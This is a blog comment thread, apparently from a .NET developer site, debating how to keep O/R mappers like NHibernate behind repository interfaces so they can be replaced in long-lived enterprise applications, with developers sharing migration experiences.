I don't expect my clients to have to rewrite an application I delivered after only five short years. If they had to rewrite Headspring's work at five years, we would have a pretty bad reputation. We expect that system we develop will have a very long life. They will see infrastructure technology come and go, and the core will live on.
@Frans,
I definitely did now write a comparison of O/R Mappers. Rather I'm trying to communicate that whatever tool is used, it should be used decoupled from the core of the application's logic. In this way, upgrades and eventual replacement will be possible without rewriting the entire application.
Since you bring up features, I'm sure LLBLGen has many more features than NHibernate. Given that, if folks bought products based on feature lists, our economy would be quite a bit more predictable.
@Rick,
Discussing theory and being impractical is a bit dangerous, and I try not to give any guidance through my blog unless I have specific experience with it through real work. As the CTO of Headspring Systems in Austin, this is a topic we've put quite a bit of work into. We've worked with legacy systems, built new systems and continually upgraded and enhanced systems already built.
This scenario is real for us and practical. We don't have a lot of code around this (I also am leery about overengineering). We accomplish this loose coupling by interfaces and reversing the project reference so that infrastructure references core and not the other way around.
I intend to make a full application available to the community that illustrates the principles we follow as a company. I understand it's difficult for me to clearly communicate without concrete examples.
@Andy,
>"The blurring of Data Access and Business Logic isn't too evil after all."
The coupling of data access and business logic is still "evil". The context I'm living in is long-lived enterprise applications, not small, quick-hit applications. Therefore, these parts need to be de-coupled for maintenance reasons.
I am fully aware of the new technologies and APIs coming from Microsoft, but object-oriented principles and design practices are not altered by these new APIs. Consider them all and then choose which to use on small, trivial apps vs. which to use on long-lived enterprise apps.
@Onur,
Isolating NHibernate _does_ work in practice, and I have 10 systems in production using NHibernate (for various clients) that illustrates how it can be done. I intend to release a reference application to help the community with this issue.
There are some conventions that _could_ bleed over if we aren't careful, but with a disciplined domain-driven design approach, it's not only possible, but quite easy to pull out NHibernate and create new repository implementations which persist in a different way.
@Paul,
At Headspring, we tend not to prefer frameworks. Rather, we enjoy using libraries. For instance, we hand-role the entire core of our application and then use libraries to keep from writing the following types of code: logging, data access, UI controls, caching, mocking, IoC. . .
We use a framework in ASP.NET, but that's our only compromise. The other libraries used are easily kept behind interfaces, and they don't bleed into the core of the system. These libraries include: Log4Net, NHibernate, various UI controls, Lucene.Net, RhinoMocks, StructureMap, Windsor.
@Tim,
We don't de-couple NHibernate from our repository classes. We intentionally couple them to NHibernate. The core of the application relies on repository interfaces, which merely have implementing classes that are coupled to NHibernate. The core only depends on the interfaces.
To bring in different persistence, we would create new repository classes that all implement the same repository interfaces. By using the same automated test cases (APIs changed to support the new persistence technique), we can reliably ensure that the needed persistence scenarios are supported.
My experience with O/R Mappers is that you'll have to rewrite at least some code if you decide to switch out SOME code, like querying, no matter how loosely coupled your application was written. As Jeffrey already mentioned, in order to switch out nhibernate he would have to rewrite his repository implementations, but thats it.
NHIbernate is probably the one mapper that allows the LEAST possible coupling to itself. I've used Wilson, LLBLGen, Nolics, and a few others. By far, NHibernate is the least intrusive to your code.
Frans, I'm going to pick on you a bit here, but please don't take it personally:
"This means that your own code will use and will be based on the characteristics provided by the data-access solution of choice...Also, the naive view on being able to swap out any o/r mapper you pick clearly shows you never gave it much thought: no matter which data access solution you pick, (so that means: whatever you choose) it will leak through into your own code"
Not so. If you layer your code correctly, you won't have to change near as much. I recently switched a small application from using WilsonORM to NHibernate. It took me about 4 hours, and most of that was changing queries to use HQL instead of OPath. Its true that if it was a bigger application it would have taken longer, but it would have also been easier had a layered things more the way Jeffrey suggests.
"Does it offer entity views on entity collections for easy in-memory filtering/sorting ? does it offer auditing/authorization? Which concurrency models are supported? Does it offer deep support for distributed systems so you don't have to babysit what's going over the wire?"
Those are all great features, but honestly, even for large complex applications, i don't often need all that. I can do an in-memory sort or filter of a collection using lambdas in .net 3.5 in just a few lines of code. I follow the Martin Fowler first rule of distributed architectures: "Don't distribute" unless there's a real need to. There are other tools to do auding and authorization. And in any case, do all these BELONG in an o/r mapper? Yes, if you rely on an ORM that has all these features and you use all of them throughout your domain objects, you'll be pretty tied that that ORM. But i see no compelling reason to do that. Those kind of things don't really belong in my domain model. If the ORM forces you to put them in the domain model, then something is wrong, in my opinion. But if you stick to the core of your application being POCOs and not being tied to the ORM, switching the ORM out really doesn't require a full rewrite.
It really depends on the ORM being used and how its used. Just because many ORMs require strong coupling between themselves and the domain objects doesn't mean all of them do. I think its a good idea to consider that coupling when choosing an ORM and whether or not you want your app to be tied to it 5 years from now.
I do wonder why you would want to swap an orm. Because you start using another database? Nah, that can't be the reason; most mappers support the majority of databases and if not they most likely have an API you can implement. And if it really doesn't support it, you have done something wrong in the beginning.
Or because you reach technical/functional limitations of the ORM? In that case, you didn't do your homework correctly in the first place. You should already have looked at that kind of stuff when you decided what to use.
There is not a single company in the world who would want to switch their existing perfectly working applications which are using NHibernate to EF (Just an example), because it is "available" or "possible". Maybe in an application rebuild or a business decision to migrate fully to EF. But if you start keeping all that kind of things in mind, start preparing your applications for an nuclear warfare! It might happen!
@Z
It depends on the application. For many applications such as small business websites we work on, the ORM will possibly outlive the website, i.e. the website will be rewritten or die before there is a need to switch out an ORM. For other applications with a longer lifespan, a new ORM may come along that works better, no matter how much homework you do ahead of time. Its not unusual for some applications to have a very long life--think of all the cobol apps that are still out there!
As an example, we have this one "small" website with a lot of database functionality that has homemade domain objects that are tightly coupled to a homemade ORM using ado.net objects like datareaders. I can't switch out the homemade ORM because all the persistence logic is mixed in with the domain objects. But man would i ever be more productive if i could plug in NHibernate or EF without having to rewrite the whole thing! So in this case, we really would have benefited from the previous developers loosely coupling the ORM from day one.
Another example was at my last job we had some apps using CSLA and one using LLBLGen and we were moving to WilsonORM. The swap was impossible without a rewrite, but desired by management in order to standardize on WIlson.
Most companies don't want to switch out their ORMs precisely because it would involve rewriting their whole application. But if it only involved swapping one layer and could provide standardization on the new ORM and enable more productivity, I think many companies would.
Late to the conversation here, but have a real(ish) example.
If you stick to using Interfaces, such as IRepository<TEntity> and implement concrete repositories such as NHibernateRepository<TEntity>, which has minimal bleed through, so you're practising strict separation of concerns and decoupling then exercises like this become easier:
A quick prototype app, which utilises ISubSonicRepository, suddenly 'evolves' into production and then in a blink of an eye needs to scale...
Just to keep you on your toes (and more likely to happen to all of us) the business decides to Persist People entities in Active Directory, of course augmented with database persisted details...(that hurt, hence my strong endorsement of at least trying to implement Jeffrey's suggestion.)
We recently outsourced an application the data is still available and mutable. However we have to use web services (some XML-RPC, some SOAP).
Therefore I think the above article is incredibly sensible because not only may you need to change O/RMs but you may need to chance persistence technologies entirely. LDAP is very different to SubSonic!
Don't learn the hard way like I did!
Such a heated debate but also interesting too. For my two cents worth I agree with the concepts of the article and question anyone using features of an O/RM outside of their business/application layers. The general approach I take is one of service based whereby data access is service based at a CRUD level and business process level (two logical layers). Should we want to change the O/RM we'd only have to swap out the CRUD service layer (its the only thing that typically access the database). Now, having said that, this 'seperation' does have its drawbacks, namely that you can't access data as easily as you might like ie via an LLBGEN/nHibernate/Linq etc query from other layers. As you've abstracted this into data retrieval/storage interfaces, which have no understanding of the implementation. There are definately pros and cons for any solution, though I think the added abstractions will serve you better in the long run.
As a side note: Am I the only one who doesn't like the concept of DataContexts with O/RMs? Ie they don't play very well in service oriented architectures.
---------------------------------------------
Disclosure: I'm working on an O/RM mapper using a service based approach. Based on templates and the assumption you will change it!
This discussion can be continued here:
jeffreypalermo.com/.../making-it-easy-to-replace-nhibernate-in-five
|
http://codebetter.com/blogs/jeffrey.palermo/archive/2008/06/23/objectively-evaluating-o-r-mappers-or-how-to-make-it-easy-to-dump-nhibernate.aspx
|
crawl-002
|
refinedweb
| 4,623
| 61.87
|
How can I print a specific number of digits after decimal point in cpp?
As like, if I want to print more than 30 digits after decimal point while dividing 22 by 7 then how can I? Plz!
Below is working code snippet of printing a certain amount of decimal points. So couple things to note: 1)Library needed is iomanip. 2) fixed means everything after decimal point 3) setprecision() means number of digits.
If you don't put fixed then it would count whole numbers before the decimal point as well. However since you want 30 AFTER decimal point you put fixed and setprecision(30).
#include <iostream> #include <iomanip> using namespace std; int main() { double answer = 22.0/7.0; cout << "22.0 / 7.0 = " << fixed << setprecision(30) << answer << endl; return 0; }
|
https://codedump.io/share/PRuw4gYMCXJR/1/how-can-i-print-a-specific-number-of-digits-after-decimal-point-in-cpp
|
CC-MAIN-2017-43
|
refinedweb
| 133
| 67.35
|
If you are into computed tomography (CT) from the perspective of algorithm development, or if you want to do the reconstruction yourself instead of using a standard software package (e.g., the one that was included with your scanner), you cannot ignore the ASTRA Tomography Toolbox. Well, I am confident you can, if you put your mind to it, but you shouldn’t. This toolbox is developed by the ASTRA research group (“All Scale Tomographic Reconstruction Antwerp”) of the Vision Lab of the University of Antwerp, together with the Computational Imaging group of the Centrum Wiskunde & Informatica (CWI). Full disclosure: I work at the Vision Lab as a postdoc. However, this article is not sponsored or endorsed by the Vision Lab, it is purely my own opinion.
Quoting from the official description:
It supports 2D parallel and fan beam geometries, and 3D parallel and cone beam. All of them have highly flexible source/detector positioning. A large number of 2D and 3D algorithms are available, including FBP, SIRT, SART, and CGLS. The basic forward and backward projection operations are GPU-accelerated, and directly callable from MATLAB to enable building new algorithms.
During my own PhD research, I have used the ASTRA Toolbox for algorithm development. Because the Toolbox provides GPU implementations of basic components such as projectors, I could use GPU processing already during the experimental stage, allowing me to use real-world (i.e., large) datasets during testing. This is not obvious, since it is often only when an algorithm is complete that a GPU version is written, restricting initial testing to the aptly named academic examples.
MATLAB Wrapper
First of all, to put your mind at rest if you are not a hardcore programmer, the ASTRA Toolbox comes with a user-friendly MATLAB wrapper. All functionality of the Toolbox is available from MATLAB. Since MATLAB is the main way to use the Toolbox, I’ll leave you in the good hands of the official documentation for that, and add an example of my own below that uses the contributed Python wrapper.
Python Wrapper
If you are more of a Python person, there is also a Python wrapper. As an example, I’ve written a Python script that recreates the example with the two white squares on the Wikipedia page on the Radon transform (and additionally also reconstructs the sinogram). The example shows that you can do a lot with only a few lines of code. To keep things brief, there are not a lot of comments, but there are more detailed examples for each part of this script in the samples directory of the Toolbox.
import numpy as np from scipy import misc import astra # Create phantom. phantom = np.zeros((128, 128)) phantom[32 : 64, 32 : 64] = np.ones((32, 32)) phantom[64 : 96, 64 : 96] = np.ones((32, 32)) misc.imsave('phantom.png', phantom) # Create geometries and projector. vol_geom = astra.create_vol_geom(128, 128) angles = np.linspace(0, np.pi, 180, endpoint=False) proj_geom = astra.create_proj_geom('parallel', 1., 128, angles) projector_id = astra.create_projector('linear', proj_geom, vol_geom) # Create sinogram. sinogram_id, sinogram = astra.create_sino(phantom, projector_id) misc.imsave('sinogram.png',('reconstruction.png', reconstruction) # Cleanup. astra.algorithm.delete(algorithm_id) astra.data2d.delete(reconstruction_id) astra.data2d.delete(sinogram_id) astra.projector.delete(projector_id)
The output of this script is shown below. On the left is the phantom with the two white squares. In the middle is the sinogram, which contains a (2D) projection in each horizontal line. From this sinogram, the reconstruction on the right was created through the algebraic algorithm SIRT.
For more information on tomography itself, have a look at my series of articles on that subject. There is also a tutorial on creating a 3D reconstruction from 2D cone-beam projections that you might find interesting if you are working with your own datasets.
[update] This post was selected for Writing Clinic at DailyBlogTips! As a result, I was able to make several improvements to the text. Thanks again, Ali!
[update 2] Updated the homepage of the Toolbox; added CWI as a developer; reformulated the text to reflect that the Python wrapper is now an integral part of the Toolbox, instead of a contributed module.
I'm pretty new to using a lot of external libraries in python. My question is, I've downloaded the files for PyASTRA, but I only see install instructions for windows and linux. Do you know if it's possible to install them and use them on an OS X machine?
I’m sorry to have to inform you that OS X is not supported at this time… On a separate note, you don’t have to download the Python interface separately anymore, since it is included in the main ASTRA Toolbox since version 1.6.
hello
I have some 2D X-ray images of an aluminium model. I want to get the cross sectional CT image of that model. Is it possible using this software? If possible then how?
If your data is suitable for CT reconstruction, i.e., if you have a sufficient number of images that were taken with a CT scanner, or at least with a fixed source and detector and a rotating stage, then this should be relatively easy. I would like to point you to the examples that are included with the ASTRA Toolbox. Also note that your images must be preprocessed to make them true projections, as I explain in my series of articles on tomography. If your data consists of only a few images, or was taken with unknown source and detector positions, then it will be much more difficult or even impossible.
Thank you for your answer. I have all the information about detector positions and also all the X-ray images as well. But the problem is i got confused about ASTRA toolbox. Inside the toolbox all the examples used a single phantom and than rotate it to different directions. But my question is, how i can use all the available projections for CT reconstruction. I mean i want to use a series of images rather than using a single image and rotate is to different directions. Really waiting for your response.
The examples in the Toolbox often start from a phantom to create a dataset. Of course, you already have a dataset, and only need the second part of the example. It might also be confusing that the examples are often in 2D, where the “X-ray images” are then 1D, and grouped in a so-called sinogram. You could create a sinogram like that from your data by taking a single row from each of them, but it’s probably easier to immediately create a 3D reconstruction. Another tip is that, if your dataset was recorded using a typical source and a flat-panel detector, you’ll probably need to use a cone-beam geometry (and not a parallel-beam one).
Hi, great toolbox!!
I was wondering if it is possible to perform 3D conebeam reconstructions without GPU. I've only found the functions for GPU. Thanks in advance!
Thanks! It is indeed not possible to perform 3D cone beam reconstructions without a GPU, because there are no CPU versions of the 3D algorithms in the Toolbox. And, of course, for cone beam you cannot run a 2D algorithm on a slice-by-slice basis like you can do for parallel beam…
Ok, thanks a lot for the answer Tom!
Hi !
Thanks for your very nice webpage. I am discovering the astra toolbox and I was wondering how to use it (for 3D cone beam) in colab ?
Thanks in advance,
Stephane
I have no experience with Colab, Sorry…
In response to D M BAPPY on 4/12/16 you mentioned the examples start from a phantom to create the dataset. I have x-ray images from a flat panel detector and the proj_geom and vol_geom are understood. My question is how to get the projection data into sinograms? All the examples seem to forward project the phantom object to get the sinograms which the reconstruction then uses. I am missing how to get the normalized projection data into a sinogram soa reconstruction can then be made. What am I missing?
I am responding to your response to D M BAPPY on 4/12/16. I have cone beam projections for a flat panel and I have set up proj_geom and vol_geom and that all makes sense. What is not clear is how to get sinograms as the reconstruction needs the sinograms to make the reconstruction. All the examples make the sinograms from forward projection of the object. I don't see how to get sinograms from projection data or how to feed projection data into a reconstruction algorithm. Any clarification for this would let me experiment with real world data. Thanks.
I can see that function names such as "
astra_create_sino3d_cuda" might be confusing in this respect. In practice, the 3D volume that these functions produce is simply a stack of images, exactly like the images that you get from a scanner. However, there are also sinograms in the data volume. You get these by slicing the volume in a different direction. Sinograms are typically how projection data is viewed when tomography is done in 2D, so when a single slice is reconstructed. But, in 3D, projection data are just images. Hence, there is no need to create sinograms...
Hi Paul,
Have you find a solution to your problem? I have the same questions about how to feed my 2D projected images into Astra for a cone beam reconstruction. If you have a piece of code to share it would be greatly appreciated. It is strange that people seem to avoid giving realistic examples. We cannot use synthetic images of phantoms all the time!
MRB
I would start from example
s007_3d_reconstruction.mand adapt that. First of all, you have to intialize
proj_geomwith the projection geometry of your data, of course. Then, instead of generating the projections from a phantom using
astra_create_sino3d_cuda(), create a projection data object directly using
astra_mex_data3d('create', '-proj3d', proj_geom, your_data)(see also example
s006_3d_data.m). Does this help?
Hello Tom,
As DM Bappy, PauC and Michel Bouchard, I need to reconstruct data, starting from real projections (Tiff files) produced by a CBCT scanner. I tried to follow your advices without any success. Is it possible to get an exemple of code? Thanks
Okay, you guys have convinced me. I’ll write a new post with an example that starts from projection images. You will have to give me a few weeks to find the time to do that, I’m afraid, but it’ll come!
It took a while, but there is now a brand spanking new tutorial on creating a 3D reconstruction from 2D cone-beam projections. Go there for more information!
Hi,
I'm on Windows 7Pro and I have installed Python 3.6 with Miniconda and right after that the Astra package with
"conda install -c astra-toolbox astra-toolbox"
I'm trying to run your example and it seems I'm missing something from scipy.misc? I'm new with all the Python environment stuff, any idea what I'm missing?
Traceback (most recent call last):
File "D:/Tomo/Test.py", line 11, in
misc.imsave('phantom.png', phantom)
AttributeError: module 'scipy.misc' has no attribute 'imsave'
Regards,
Bruno
I'm not entirely sure, but I think that you might need to install the SciPy package manually (also using
conda install) if you use Miniconda. I always install the full Anaconda package, which comes with may packages preinstalled, including NumPy and SciPy.
I tried with Conda and Python 3.6 but maybe some packages are missing? I think I will try again from scratch with a full Anaconda install. On the Astra documentation page
they say they have Windows binaries for Python 2.7 and 3.5. Thinking about it, it's probably because of I used Python 3.6 that it did not work... Which version of Anaconda Python were you using (2.7, 3.4, 3.5, 3.6 are available)?
Regards,
Bruno
Add new comment
|
https://tomroelandts.com/index.php/comment/692
|
CC-MAIN-2022-40
|
refinedweb
| 2,021
| 65.12
|
Provided by: liblfc-dev_1.10.0-2build3_amd64
NAME
lfc_chown - change owner and group of a LFC directory/file in the name server
SYNOPSIS
#include <sys/types.h> #include "lfc_api.h" int lfc_chown (const char *path, uid_t new_uid, gid_t new_gid) int lfc_lchown (const char *path, uid_t new_uid, gid_t new_gid)
DESCRIPTION
lfc_chown sets the owner and the group of a LFC directory/file in the name server to the numeric values in owner and group respectively. If owner or group is specified as -1, lfc_chown() does not change the corresponding ID of the file. lfc_lchown is identical to lfc_chown except for symbolic links: it does not follow the link but changes the ownership of the link itself. path specifies the logical pathname relative to the current LFC directory or the full LFC
|
http://manpages.ubuntu.com/manpages/disco/man3/lfc_chown.3.html
|
CC-MAIN-2020-34
|
refinedweb
| 130
| 62.38
|
Board index » python
All times are UTC
Can anyone give me hint about what's wrong with the following program?
#!/usr/local/bin/python # this is a simple program that uses threads
import thread.
Adam Bjornholm
--Guido van Rossum (home page:)
Subject: I'm stumped on threads
1) One_Thing will have no observable side effects since counter is a local variable of the function. You need to use "global" in the function.
2) Even if you fix this the program you wrote is nondeterministic because the "main thread" may "race ahead" of the other two in which case 0 for the counter is possible, but 1 or 2 might also be possible. Ain't threads confusing?
-- Aaron Watters === ...he says "What you gonna do with your life?" "Oh, Daddy dear, you know you're still number 1 But girls just wanna have fun!" -- Cindi Lauper.
>.
Try changing the first line of One_Thing and Two_Thing to: identone=thread.get_ident() # same for identtwo...
--------------------------------------------------- B. Lloyd, Digital Creations, L.C.
Software Engineer v: (540) 371-6909
> Can anyone give me hint about what's wrong with the following program?
> ... and various discussions followed...
import thread from time import sleep
class counterClass: def __init__(self): self.count = 0 def view(self): self.count = self.count + 1 return count
def threadFun(name, counter): for x in range(10): print "Thing %s (%s)"%(name, counter.view()) sleep(10)
counter = counterClass() thread.start_new_thread(threadFun,("One", counter)) thread.start_new_thread(threadFun,("Two", counter))
-- John "more a dr suess guy than a monty python guy" Lehmann
ps I don't think that anyone mentioned that start_new_thread returns None, regardless (of anything)
1. [Fwd: Re: I'm stumped on threads]
2. thread mystery on Solaris; even Guido is stumped
3. An AWK poser that's stumped a novice
4. Okay, I'm stumped.
5. error 19 - i'm stumped - snip [1/1]
6. I'm Stumped ...
7. Problems installing pythonwin - I'm stumped
8. proc global problem - I'm completely stumped
9. I'm stumped, need help
10. expect u question - i'm stumped - completely...
11. yes i'm stumped
12. Thread#kill doesn't kill processes inside a thread
|
http://computer-programming-forum.com/56-python/b8f8e40a7de88046.htm
|
CC-MAIN-2020-05
|
refinedweb
| 359
| 77.64
|
Opened 3 years ago
Closed 3 years ago
#20193 closed Uncategorized (duplicate)
About replacing PIL with Wand
Description
Hello,
I've been using Django 1.3 on a small project and have a custom template tag to return image dimensions. I have imported the django.core.files.images module. The PIL library which is in use there seems to be a little restrictive in terms of the kinds of files it can accept. I used a sample TIF file I had and called 'get_image_dimensions' with this file path. PIL was not able to identify the TIF file. A simple JPG file worked fine.
Instead, I used Wand on the same TIF file and was able to get dimensions accurately. Here's an example of it's usage from the page:
from wand.image import Image
with Image(filename='mona-lisa.png') as img:
print img.size
I have not tried any further to validate the robustness of this package, but general reading seemed to suggest that Wand is a newer version layered upon ImageMagick and may even have a PIL compatibility layer in the future.
Just wanted to bring this up for consideration. Thanks for your time.
Change History (1)
comment:1 Changed 3 years ago by pegler
- Needs documentation unset
- Needs tests unset
- Patch needs improvement unset
- Resolution set to duplicate
- Status changed from new to closed
Moving away from PIL was brought up a few weeks ago on the django-developers mailing list. The current plan appears to be to move to Pillow.
See the thread
And the resulting ticket:
If you have an opinion on what package to move to, I'd recommend commenting in that ticket.
Best,
Matt
|
https://code.djangoproject.com/ticket/20193
|
CC-MAIN-2016-36
|
refinedweb
| 282
| 64.1
|
Python.
Example: The Friedman Test in Python
A researcher wants to know if the reaction times of patients is equal on three different drugs. To test this, he measures the reaction time (in seconds) of 10 different patients on each of the three drugs.
Use the following steps to perform the Friedman Test in Python to determine if the mean reaction time differs between drugs.
Step 1: Enter the data.
First, we’ll create three arrays that contain the response times for each patient on each of the three drugs:
group1 = [4, 6, 3, 4, 3, 2, 2, 7, 6, 5] group2 = [5, 6, 8, 7, 7, 8, 4, 6, 4, 5] group3 = [2, 4, 4, 3, 2, 2, 1, 4, 3, 2]
Step 2: Perform the Friedman Test.
Next, we’ll perform the Friedman Test using the friedmanchisquare() function from the scipy.stats library:
from scipy import stats #perform Friedman Test stats.friedmanchisquare(group1, group2, group3) (statistic=13.3514, pvalue=0.00126)
Step 3: Interpret the results.
The Friedman Test uses the following null and alternative hypotheses:
The null hypothesis (H0): The mean for each population is equal.
The alternative hypothesis: (Ha): At least one population mean is different from the rest.
In this example, the test statistic is 13.3514 and the corresponding p-value is p = 0.00126. Since this p-value is less than 0.05, we can reject the null hypothesis that the mean response time is the same for all three drugs.
In other words, we have sufficient evidence to conclude that the type of drug used leads to statistically significant differences in response time.
|
https://www.statology.org/friedman-test-python/
|
CC-MAIN-2022-21
|
refinedweb
| 271
| 72.05
|
I was using version 4.4 and I have just aupgraded to 5.0 and I get now a Parsing exception when parsing this file:
public class Java14Test {
public void testJdk14Enum() {
Enumeration enum = null;
}
}
The parsing exception is thrown because of the 'enum'. However, this is valid Java 1.4 (not Java 1.5 since 'enum' is a reserved keyword in Java 1.5). I was getting no problems with Checkstyle 4.4 but I am not with version 5.0. Was the support for Java 1.4 dropped in version 5.0 of checkstyle? Or is this an actual bug?
Thank you.
Roman Ivanov
2013-11-09
Roman Ivanov
2013-11-09
yes problem exists, but Checkstyle does not support few versions of Java, no way to configure that easily. And now nobody care about java4.
|
http://sourceforge.net/p/checkstyle/bugs/610/
|
CC-MAIN-2014-41
|
refinedweb
| 137
| 79.36
|
In nearly every solution there is the need to have a unique numbering of the Custom Business Object instances.
Until now in most cases a special Custom Business Object is “misused” for this functionally.
With the release 1405 we finally provide a reuse library which does the job.
Here I want to describe how this reuse library can be used and explain it with some examples.
Use Case “Quote, Order, Invoice Numbering”
You are using quotes, orders, and invoices and need to number them in separate intervals.
Step 1: Create a own Code Data Type
As we are working with quotes, orders, and invoices, I created a own code data
type and named it “OrderType”.
Step 2: Custom Reuse Library
The reason to create a Custom Reuse Library is that you can centralize the creation
of the numbers and reuse this.
This Custom Reuse Library should contain a function to derive the numbers
which has as an input parameter the order type.
Step 3: Code the Function in the Custom Reuse Library
In the resp. ABSL code the Reuse Library NumberRange is called to draw a new number for the order type from the input. We use the order type as so called Number Range Object to separate between different number ranges.
As we want to separate the number between the order types a switch statement follows in which the formatting takes place.
The result is convert to string and assigned to the return parameter
Step 4: Call of the Function in the Custom Business Object Script
In the ABSL coding of the Custom Business Object Quote the drawing of the invoice number looks like this.
Similar are the Order and Invoice:
Use Case “Special Format for Records”
You need to format the identification of a record in a distinct manner; especially you want to include the current year.
Step 1: Call the Reuse Library
Call the Reuse Library to draw a new number for the record. Use the string “RECORD” for the Number Range Object.
Step 2: Format the Number
We want to prefix each and every number with the letter “R”, have the current year, and the number with 4 digits. Each part is separated by a minus sign.
As the length of the return value of the DrawNumber function of the Reuse Library is char 60 we use Substring 56.
Step 3: Call of the Function in the Custom Business Object Script
The call in the ABLS code is very simple.
Step 4: Reset the Number Range Object
As we include the current year we want the numbers to restart each year. Therefore we need to reset the Number Range Object by calling this code.
That’s all, folks.
Horst
Hi Horst,
thanks for your blogpost.
I have a question, as the above mentioned way doesn’t work and we are getting dumps in ByD.
We have created a Codelist with an entry of our own created bo (ABCNumber). We are handling this Codelist value in the parameter of the created custom reuse library.
In the reuse library we draw the number from the NumberRange as you mentioned above. Unfortunately we are getting a dump when we are exectuing this.
The call is: var number = NumberRange.drawNumber(“ABCNumber”)
Could you maybe help us here?
Best Regards,
Daniel
Hello Daniel,
Can you provide some details about the dump?
Bye,
Horst
Hi Horst,
thanks for your respond.
We have tried to get a solution for this issue and we now found one. If we are using the following code, there will be a number drawn from the number range:
//
var numberRange : ID = “Record”;
var number = NumberRange.DrawNumber(numberRange);
var aktID = (100000 + number).ToString();
//
We don’t know, why we got a dump, but finally it works.
Best Regards,
Daniel
Hello Daniel,
If there any issues, please contact me.
Bye,
Horst
Hi Horst,
I am getting “0” when I use NumberRange.GetNumber function in another instance.
BeforeSave for instance 1
var rec : ID=”ORDER”;
var num=NumberRange.DrawNumber(rec); // is 3.
var currentNum=NumberRange.DrawNubmer(rec); // is 3
BeforeSave for instance 2
var rec : ID=”ORDER”;
var current=NumberRange.GetNumber(rec); // always gives “0”.
with a warning “Invalid Importing Parameter Namespace”.
Best Regards
Fred.
Hello Fred,
Because of this message you will get the “0” back.
The message is raised because the namespace of your solution was not handed over.
Any special for the second instance?
Otherwise you need to raise a incident.
You can ask the processor to put it direct on my name. 😀
Bye,
Horst
Hi Horst,
Thanks .
“Not handed over”? I dont understand what you mean. 🙂
How can I make it handed over? 🙂
I think there is nothing special in the second instance.
Best Regards
Fred
Hello Fred,
That’s nothing you are doing direct. 😀
It the system, stupid. 😉
So, create the incident.
Sorry,
Horst
Thank you Horst for the great blog.
Regards,
Gincy Anto.
Hi Horst,
Thanks for sharing such type of blog!!!!
I go through this blog , Firstly i have created code list data type with order only then create reuse library.
When i have written code in GetOrderNumber.absl then it gives dump. I am not accessing Code list name directly .
Can you help me on this.
Regards,
Puneet Mittal
Hello Puneet,
May you post the code?
Bye,
Horst
|
https://blogs.sap.com/2014/06/27/how-to-use-the-reuse-library-numberrange/
|
CC-MAIN-2017-51
|
refinedweb
| 885
| 75.5
|
How to Unzip file in Python
In this article, we will learn how one can perform unzipping of a file in Python. We will use some built-in functions, some simple approaches, and some custom codes as well to better understand the topic. Let's first have a quick look over what is a zip file and why we use it.
What is a Zip File?
ZIP is the archive file format that permits the first information to be totally recreated from the compacted information. A zip file is a single file containing one or more compressed files, offering an easy way to make large files smaller and keep related files together. Python
ZipFile is a class of
zipfile module for reading and writing zip files. We need zip files to lessen storage necessities and to improve transfer speed over standard connections.
A zip folder consisted of several files, in order to use the contents of a zip folder, we need to unzip the folder and extract the documents inside it. Let's learn about different ways to unzip a file in Python and saving the files in the same or different directory.
Python Zipfile Module
Python
ZipFile module provides several methods to handle file compress operations. It uses context manager construction. Its
extractall() function is used to extract all the files and folders present in the zip file. We can use
zipfile.extractall() function to unzip the file contents in the same directory as well as in a different directory.
Let us look at the syntax first and then the following examples.
Syntax
extractall(path, members, pwd)
Parameters
path - It is the location where the zip file is unzipped, if not provided it will unzip the contents in the current directory.
members - It shows the list of files to be unzipped, if not provided it will unzip all the files.
pwd - If the zip file is encrypted then the password is given, the default is None.
Example: Extract all files to the current directory
In the given example, we have a zip file in our current directory. To unzip it first create a ZipFile object by opening the zip file in read mode and then call extractall() on that object. It will extract all the files in the current directory. If the file path argument is provided, then it will overwrite the path.
#import zipfile module from zipfile import ZipFile with ZipFile('filename.zip', 'r') as f: #extract in current directory f.extractall()
Example: Extract all files to a different directory
In the given example, the directory does not exist so we name our new directory as "dir" to place all extracted files from "filename.zip". We pass the destination location as an argument in extractall(). The path can be relative or absolute.
from zipfile import ZipFile with ZipFile('filename.zip', 'r') as f: #extract in different directory f.extractall('dir')
Example: Extract selected files to a different directory
This method will unzip and extract only a particular list of files from all the files in the archive. We can unzip just those files which we need by passing a list of names of the files. In the given example, we used a dataset of 50 students (namely- roll1, roll2, ..., roll50) and we need to extract just the data of those students whose roll no is 7, 8, and 10. We make a list containing the names of the necessary files and pass this list as a parameter to extractall() function.
#import zipfile and os module import zipfile import os #list of necessary files list_of_files=['roll7.txt','roll8.txt','roll10.txt'] with zipfile.ZipFile("user.zip","r") as f: f.extractall('students',members = list_of_files) print("List of extracted files- ") #loop to print necessary files p=os.path.join(os.getcwd(),'students') for item in os.listdir(path=p): print(item)
List of extracted files- roll7.txt roll8.txt roll10.txt
Python Shutil Module
Zipfile provides specific properties to unzip files but it is a somewhat low-level library module. Instead of using zipfile the alternate is
shutil module. It is a higher-level function as compared to zipfile. It performs high-level operations on files and the collection of files. It uses
unpack.archive() to unpack the file, Let us look at the below example to understand it.
Syntax
shutil.unpack_archive(filename , extract_dir)
Parameters
unpack_archive - It detects the compression format automatically from the "extension" of the filename (.zip, .tar.gz, etc)
filename - It can be any path-like object (e.g. pathlib.Path instances). It represents the full path of the file.
extract_dir (optional) - It can be any path-like object (e.g. pathlib.Path instances) that represents the path of the target directory where the file is unpacked. If not provided the current working directory is used as the target directory.
Example: Extract all files to a different directory
# importing shutil module import shutil # Path of the file filename = "/home/User/Desktop/filename.zip" # Target directory extract_dir = "/home/username/Documents" # Unzip the file shutil.unpack_archive(filename, extract_dir)
Conclusion
In this article, we learned to unzip files by using several built-in functions such as
extractall(),
shutil() and different examples to store extracted contents in different directories. We learned about zip files and their Python module.
|
https://www.studytonight.com/python-howtos/how-to-unzip-file-in-python
|
CC-MAIN-2022-21
|
refinedweb
| 877
| 56.96
|
This class is used to queue a function call action. More...
#include <ExecutableCode.h>
This class is used to queue a function call action.
Exact use is to queue onLoadInit, which should be invoked after actions of in first frame of a loaded movie are executed. Since those actions are queued the only way to execute something after them is to queue the function call as well.
The class might be made more general and accessible outside of the MovieClipLoader class. For now it only works for calling a function with a two argument.
Implements gnash::ExecutableCode.
Mark reachable resources (for the GC).
Reachable resources are:
Reimplemented from gnash::ExecutableCode.
References gnash::as_value::setReachable(), and gnash::GcResource::setReachable().
|
http://gnashdev.org/doc/html/classgnash_1_1DelayedFunctionCall.html
|
CC-MAIN-2014-35
|
refinedweb
| 118
| 58.99
|
In a perfect world, our applications would never have errors and our users would use our application just as we intended, however it's not a perfect world and there will be bugs in our code and users will always be unpredictable!
